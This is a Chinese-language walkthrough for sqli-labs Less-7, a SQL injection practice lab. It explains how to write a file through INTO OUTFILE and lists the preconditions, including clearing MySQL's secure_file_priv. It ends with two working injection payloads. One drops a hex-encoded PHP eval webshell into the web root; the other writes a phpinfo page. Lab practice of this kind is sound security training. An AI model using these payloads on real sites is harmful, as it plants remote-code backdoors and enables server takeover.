sqli-labs之Less-7 GET注入写shell

验证注入点：单引号报错，'))

根据提示，是想让我们试试写shell

第一个条件 secure_file_priv

写shell即MySQL需要对外写文件，但默认MySQL是不允许outfile来导出数据的，先动手在MySQL确认一下。

MySQL特性，secure_file_priv 对读写文件的影响，此开关默认为NULL，即不允许导入导出。

secure-file-priv参数是用来限制LOAD DATA，SELECT ...OUTFILE,and LOAD_FILE()传到哪个指定目录的

    1、当secure_file_priv的值为null，表示限制mysqld不允许导入|导出
    2、当secure_file_prv的值为/tmp/,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
    3、当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制

windows下：修改my.ini 在[mysqld]内加入secure_file_priv =
linux下：修改my.cnf 在[mysqld]内加入secure_file_priv =

重启mysql

第二个条件 必须是root权限

第三个条件 必须知道网站路径

利用报错得到网站路径；

利用函数select @@datadir得到mysql的路径，再推导网站路径

payload：

id=1')) union select null,0x3c3f706870206576616c28245f504f53545b27707764275d293b3f3e,null into outfile 'E:/PhpStudent/phpstudy_pro/WWW/sqlilabs/Less-7/shell.php' --+

id=1')) union select 1,"<?php phpinfo(); ?>",3 into outfile "E:\\PhpStudent\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\shell.php" --+